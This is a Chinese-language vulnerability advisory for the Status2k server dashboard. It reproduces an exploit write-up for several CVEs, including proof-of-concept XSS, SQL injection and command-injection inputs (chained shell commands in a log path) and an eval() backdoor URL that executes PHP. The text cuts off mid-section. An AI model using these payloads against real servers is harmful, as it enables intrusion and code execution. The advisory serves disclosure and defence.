Status2k 多个跨站脚本漏洞(CVE

发布日期:2014-08-04
更新日期:2014-08-06

受影响系统:
Status2k Status2k
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69012
 CVE(CAN) ID: CVE-2014-5088
 
Status2k是自托管服务器统计仪表盘,可快速概览服务器机群。
 
Status2k没有在实现上存在多个跨站脚本和XSS漏洞,攻击者可利用这些漏洞在受影响站点用户上下文中执行任意脚本代码。
 
<*来源:Shayan Sadigh
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Status2k Multiple Vulnerabilities/0days
 # Date: 6/20/2014
 # Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com
 # Vendor Homepage:
 # Version: All
 # Tested on: Linux/Windows
 # CVE : CVE-2014-5088, CVE-2014-5089, CVE-2014-5090, CVE-2014-5091, CVE-2014-5092, CVE-2014-5093, CVE-2014-5094

1. Cross site scripting/XSS... there's tons, example
 admin login page, etc

login.php:

if (isset($_GET['username'])) { $useren = $_GET['username']; }
 if (isset($_POST['password'])) { $useren = $_POST['username']; }
 $q = mysql_query("SELECT * FROM ".$prefix."users");
 $adminuser = $res['adminuser']; // Login Database
 $cusername = $_COOKIE["S2KUser"];
 if ( ($cusername == $adminuser) && ($cpassword == $adminpass) ) { $lgtrue = 1; }
 if ( ($useren == $adminuser) && ($passen == $adminpass) ) {
 setcookie("S2KUser", $useren);
 if ($passen && $useren) {
 if ($useren !== $adminuser) { echo '<div
                              Username ('.$useren.') Incorrect.</div'; }
        <input type="text" size="25"

simple injection can be done in the username field, <scriptalert("poc")</script, etc

Use CVE-2014-5088 for all of the XSS issues.


 2. SQLi vulnerability in the GET (log)
 param... This isn't too useful seeing that if you had auth,
 much more damage could be done - refer to command injection
 lack of sanitization: in /admin/options/logs.php

$l = $_GET['log'];
  $q = mysql_query("SELECT * FROM ".$prefix."users");
  $query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
  $result = mysql_fetch_array($query) or die(mysql_error());
    $query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
    $result = mysql_fetch_array($query) or die(mysql_error());
    $query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
    $result = mysql_fetch_array($query) or die(mysql_error());

- PoC: site.com/s2kdir/admin/options/logs.php?log=[sqli]

Use CVE-2014-5089.


 3. Command injection
 This requires access to the Status2k Admin
 Panel, log-in and proceed to click the 'Logs' tab, then select
 'Add Logs', type in any name and for the 'Location' field use
 command injection... Then browse to the created log via the 'Logs'
 tab again.

- example: Logs --Add Logs --; then Logs --newly created log

Name: test Location: /var/log/dmesg;pwd; uname -a
 localhost/admin/options/addlog.php?type=edit&id=5

so there's no sanitization in addlog.php which lets you put anything
 you want as a log location... the issue now is that in logs.php:

$logc = cmdrun($config['logcmd'].$result['location']);
    $log = explode("\n", $logc);
    $log = array_reverse($log);

cmdrun literally calls the equivalent of exec() and thus completely
 execution of a command.

if it is complaining about dmesg... try other log locations... such as
 /usr/local/apache/logs/suexec_log, also try other bash chars, such as

| & && ; $(), etc

Use CVE-2014-5090.


 4. eval() [RCE] backdoor..
 For about a year, status2k.com was hosting a backdoored version
 of their software... either they knew it or not, there was never an
 announcement when the backdoor was found (good job).

in the file /includes/functions.php:
 eval($_GET['multies']);

site.com/s2k/includes/functions.php?multies=inject_php_code here

PoC: site.com/s2k/includes/functions.php?multies=echo 'foobar';

Use CVE-2014-5091.


 5. Another RCE
 status2k also lacks sanitization in the templates; /admin/options/editpl.php

one can literally place any malicious php code they want here and have it execute

// Let's make sure the file exists and is writable first.
 if (is_writable("../../templates/".$config['templaten']."/".$filename)) {

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/074fbc17997839f756aa7d7c02e26997.html